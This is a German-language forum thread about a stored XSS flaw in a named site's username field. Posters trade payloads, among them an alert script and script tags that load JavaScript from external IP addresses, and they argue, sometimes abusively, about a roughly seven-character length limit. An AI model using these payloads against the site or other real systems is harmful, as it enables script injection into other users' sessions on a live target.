--UPDATE-
Folgendes funktioniert noch:
<script>alert(ZAHL)</script>Thanks to @|Nobody|
Du kannst jeden JavaScript Code ausführen, ich wage sogar zu behaupten, jeden HTML Code.
Immer diese halbkrassen wannabe hacker XD
Kibba.net - Stored XSS
-
-
-
@einmadejay. Stimmt nur teilweise. Du kannst alles bis zu einer bestimmten Länge injecten. Ich schätze mal grob 7 Zeichen ab. Wenn es länger ist passt es nicht mehr in das Feld in der Tabelle der Datenbank. (Genau weiß ich das nicht, meine Meinung).
Maximal sieben Zeichen. Sonst wird ein Fehler generiert. Sei es HTML, CSS oder Javascript Code.
-
Du kannst jeden JavaScript Code ausführen, ich wage sogar zu behaupten, jeden HTML Code.Immer diese halbkrassen wannabe hacker XD
Jemand anderes musste ihm sagen, wie man einen alert in JS macht. Richtig guter Hacker bei FatalSecurity!
-
@einmadejay. Stimmt nur teilweise. Du kannst alles bis zu einer bestimmten Länge injecten. Ich schätze mal grob 7 Zeichen ab. Wenn es länger ist passt es nicht mehr in das Feld in der Tabelle der Datenbank. (Genau weiß ich das nicht, meine Meinung).
Du kannst also alles was du willst nur bis 7 Zeichen injecten. Sei es HTML, CSS oder Javascript Code.
<script src="link/script.js"></script>
& schon kannste alles machen. -
@
<script src="link/script.js"></script>& schon kannste alles machen.
Stimmt leider nicht. Du hast kein Zugriff auf den Server. Das bedeutet du müsstest auf einen anderen, externen Server den Link setzen.
z.B <script src="http://194.123.15.1/link/script.js"></script>. Das Überschreitet die x Zeichen und es wird ein Error geworfen -
@
Stimmt leider nicht. Du hast kein Zugriff auf den Server. Das bedeutet du müsstest auf einen anderen, externen Server den Link setzen.z.B <script src="http://194.123.15.1/link/script.js"></script>. Das Überschreitet die x Zeichen und es wird ein Error geworfen
Kommt auf die Länge deiner URL an.
-
Nenn mir bitte ein POC den ich selbst testen kann. Der diese Länge nicht überschreitet und ein Script von einem externen Server lädt. Dann reden wir weiter.
-
@
Stimmt leider nicht. Du hast kein Zugriff auf den Server. Das bedeutet du müsstest auf einen anderen, externen Server den Link setzen.z.B <script src="http://194.123.15.1/link/script.js"></script>. Das Überschreitet die x Zeichen und es wird ein Error geworfen
Nenn mir bitte ein POC den ich selbst testen kann. Der diese Länge nicht überschreitet und ein Script von einem externen Server lädt. Dann reden wir weiter.
Also ich hab innerhalb von 30 Sekunden einen Payload gefunden mit dem man externe Script einbinden kann
Komm schon, ihr seid doch Hacker! Ihr müsst sowas doch können! -
Finden ist einfach, funktionieren ist eine andere Sache. Bsp.:
Code<SCRIPT SRC=http://5.230.225.107/1.js>Das Script wurde zwar geladen, wurde aber nicht ausgeführt.
Und jetzt zeig den POC.
-
@einmadejay . Das ist kein POC. POC = Proof of concept.
Gib mir jetzt einen einfachen Payload der dort hinein passt.
Sonst muss ich dich jetzt als Noob einstufen.
Den Link den du mir geschickt hast wird da schonmal gar nicht hineinpassen.P.S: Nenne mir mal die "diversen Links".
-
@eimadejay Es können mit <script src=""></script> grade mal 4 Buchstaben zwischen die "" geschrieben werden.
Wenn man Glück hat funktioneren die self-closing Tags <script src="src.js" /> -
@Firesky Endlich jemand der versteht was ich versuche zu sagen.
Er hats begriffen, dann wirds bestimmt für dich bestimmt nicht so schwer sein. -
@eimadejay Es können mit <script src=""></script> grade mal 4 Buchstaben zwischen die "" geschrieben werden.
Wenn man Glück hat funktioneren die self-closing Tags <script src="src.js" />Richtig, das würd höchstens passen wenn du eine Domain ohne TLD hast. (Gibt's nicht
) -
@eimadejay Es können mit <script src=""></script> grade mal 4 Buchstaben zwischen die "" geschrieben werden.
Wenn man Glück hat funktioneren die self-closing Tags <script src="src.js" />Jo, war ein nice try.
@einmadejay . Das ist kein POC. POC = Proof of concept.
Gib mir jetzt einen einfachen Payload der dort hinein passt.
Sonst muss ich dich jetzt als Noob einstufen.
Den Link den du mir geschickt hast wird da schonmal gar nicht hineinpassen.P.S: Nenne mir mal die "diversen Links".
^ siehe oben.
In Endeffekt ist es mir sogar relativ egal, als was du mich einstufst. Ich mein, was soll es mich interessieren? XD
Wieso direkt so offensiv? -
@einmadejay . Ich verstehe nicht denn Sinn hinter dem ganzen Müll den du hier reinschreibst. Wenn du keine Ahnung von diesem Thema hast, dann schreib nichts und verpiss dich einfach.
-
@einmadejay . Ich verstehe nicht denn Sinn hinter dem ganzen Müll den du hier reinschreibst. Wenn du keine Ahnung von diesem Thema hast, dann schreib nichts und verpiss dich einfach.
Ayy lmao da ist jemand ziemlich mad.
Da macht jemand anderes mal einen Fehler und er sieht es als Chance seine Aggressionen mal auszulassen.
& von diesem Thema? Woher soll ich denn bitte wissen wie viele Zeichen im Usernamen erlaubt sind? Meine Aussagen liefen über Spekulationen lol. -
Wie man unschwer auf der ersten Seite dieses Post's erkennen kann, ist der Username auf geschätzt 7 Zeichen begrenzt.
Wenn ich alles glauben würde was geschätzt wird & mich darauf einschränke wäre ich so dumm wie du. sry
-
Finden ist einfach, funktionieren ist eine andere Sache. Bsp.:
Code<SCRIPT SRC=http://5.230.225.107/1.js>Ja, ich hab ein Payload gefunden, der funktioniert. Und es war nicht mal schwer
Seekuh Crew ist wohl doch die bessere Crew! Mal schauen ob ihr es auch schafft
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!